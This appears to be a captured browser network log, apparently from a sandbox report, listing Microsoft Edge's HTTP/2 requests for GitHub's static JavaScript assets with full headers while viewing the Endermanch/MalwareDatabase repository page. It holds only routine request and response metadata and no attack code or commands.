accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 78070
x-served-by: cache-iad-kjyo7100061-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 32, 1921
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: a461a9f9581854bbba282a294d243102f6c96597
content-length: 6015
-
GEThttps://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-530254-10744b983dd4.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-530254-10744b983dd4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:27 GMT
etag: "0x8DD34DA6BC936F5"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 1207981
x-served-by: cache-iad-kcgs7200077-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 192, 634
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 064620127bb31264872220af464be03e8465734a
content-length: 6371
-
GEThttps://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-495298-2e8f9997cff5.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-495298-2e8f9997cff5.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 24 Jan 2025 09:19:32 GMT
etag: "0x8DD3C5836BDCB3D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 556264
x-served-by: cache-iad-kjyo7100071-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 4, 715
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 075f733ac8cde2186570ba4c4976d2abb454c222
content-length: 5699
-
Remote address:185.199.109.154:443RequestGET /assets/repos-overview-6eb9887b8821.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 23 Jan 2025 07:52:21 GMT
etag: "0x8DD3B82DDF06B6B"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:52 GMT
age: 556263
x-served-by: cache-iad-kiad7000096-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 4, 737
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 11ef388c64fc10f754f1aaa93694abebd84abba3
content-length: 19065
-
GEThttps://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-6e4d797b78be.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-app_components_primer_experimental_select-panel-element_ts-6e4d797b78be.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 28 Jan 2025 18:06:33 GMT
etag: "0x8DD3FC67F6B9478"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 102120
x-served-by: cache-iad-kjyo7100109-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 19, 1781
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 367f35f247f72a59ea2cf84227b7a545eccdbece
content-length: 7752
-
GEThttps://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-adc992852f7f.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-adc992852f7f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:30:59 GMT
etag: "0x8DD34DA5B75616C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 1207986
x-served-by: cache-iad-kcgs7200071-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 9286, 1131
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d42f8e7a0f837cf41695c4ad5ea21ad538f27b5b
content-length: 543
-
GEThttps://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-2e2c4ea33da2.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-app_components_search_custom-scopes-element_ts-2e2c4ea33da2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 06 Dec 2024 19:19:22 GMT
etag: "0x8DD162AE3C55516"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 1352210
x-served-by: cache-iad-kiad7000044-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 21, 1035
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: f2e345076eecdb6e851493a52446d96a39370eec
content-length: 6323
-
GEThttps://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:00 GMT
etag: "0x8DD34DA5BD03AE3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 1207986
x-served-by: cache-iad-kiad7000114-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 25, 1088
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: de39391e7675cbc8ca530c59757e1cc8fd2f5c1b
content-length: 4066
-
GEThttps://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-ce81a738cf2d.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/ui_packages_query-builder-element_query-builder-element_ts-ce81a738cf2d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 30 Jan 2025 18:56:08 GMT
etag: "0x8DD415FC1B8CC27"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 3958
x-served-by: cache-iad-kiad7000061-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 7, 63
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c96b072816691ce3489a0ddf4a2b47aa016c6ec9
content-length: 7421
-
GEThttps://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-bd96236c8a65.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-bd96236c8a65.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:30:55 GMT
etag: "0x8DD34DA5904AD36"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 833076
x-served-by: cache-iad-kjyo7100041-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 32, 1082
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 09fcf29db092351424ea517ca87d9bf3b7a8a672
content-length: 5378
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-9e49b0faf8a7.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-9e49b0faf8a7.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:01 GMT
etag: "0x8DD34DA5C809C95"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 1207986
x-served-by: cache-iad-kiad7000041-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 26, 1084
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 12dea753bb55916e81a97ae2cb2c4199dcd0cc33
content-length: 4434
-
GEThttps://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-c43c755e10ab.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-app_components_search_qbsearch-input-element_ts-c43c755e10ab.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 29 Jan 2025 14:50:56 GMT
etag: "0x8DD4074564DDE06"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 110461
x-served-by: cache-iad-kcgs7200039-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 22, 522
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b966b02ca7dbf0850615cbb737e4afe797b1a7d2
content-length: 16676
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-c0582f143b1e.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-c0582f143b1e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 28 Jan 2025 18:06:33 GMT
etag: "0x8DD3FC67F88E68F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 110460
x-served-by: cache-iad-kjyo7100040-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 21, 1754
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c52415ef11ca35c73ee41dad8f3eba4254c10721
content-length: 2910
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-00da1f94fa19.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-00da1f94fa19.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 28 Jan 2025 18:06:33 GMT
etag: "0x8DD3FC67F8898B7"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 110460
x-served-by: cache-iad-kiad7000085-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 25, 1751
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8ec0a4c77c30cb93c6cca02fb1590140922356c5
content-length: 3157
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_markdown-accessiblity-table-element_element-entry_ts-8b624cefa171.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-ui_packages_markdown-accessiblity-table-element_element-entry_ts-8b624cefa171.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:01 GMT
etag: "0x8DD34DA5C80EA62"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 1207974
x-served-by: cache-iad-kjyo7100121-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 88, 206
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: efbe237f6159997256dd65e27548db080bb8be9f
content-length: 525
-
GEThttps://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 06 Dec 2024 19:19:22 GMT
etag: "0x8DD162AE3BAD98C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 222040
x-served-by: cache-iad-kiad7000114-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 21, 1041
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e2960da399fc70ca187fa01650049bc849dc3e8d
content-length: 5020
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-d09671e2bdec.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-d09671e2bdec.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:01 GMT
etag: "0x8DD34DA5C8027E9"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 1207986
x-served-by: cache-iad-kjyo7100114-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 4176, 1072
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8669fd2cd83283773e0a6d479a7c3c5a694736ed
content-length: 2522
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-9212063ed4b3.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-9212063ed4b3.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 28 Jan 2025 18:06:33 GMT
etag: "0x8DD3FC67F93143D"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 18594
x-served-by: cache-iad-kcgs7200097-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 31, 553
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 358e170905203a05b84dfe5765a8448432e9de75
content-length: 2789
-
GEThttps://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 00:52:32 GMT
etag: "0x8DD02B44AD10969"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 2705346
x-served-by: cache-iad-kjyo7100146-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 4848, 1062
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ac8f8dfb2fd7ed27dd1c7e1f9b5f24d450b78427
content-length: 9421
-
GEThttps://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-56b769a41ee6.jsmsedge.exeRemote address:185.199.109.154:443RequestGET /assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-56b769a41ee6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 14 Jan 2025 20:31:01 GMT
etag: "0x8DD34DA5C39F803"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 30 Jan 2025 22:03:53 GMT
age: 1207982
x-served-by: cache-iad-kiad7000106-IAD, cache-lon4270-LON
x-cache: HIT, HIT
x-cache-hits: 17, 512
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ab54f2afb2d7d3f030ffdbb604ad780388d1a11e
content-length: 5228
-
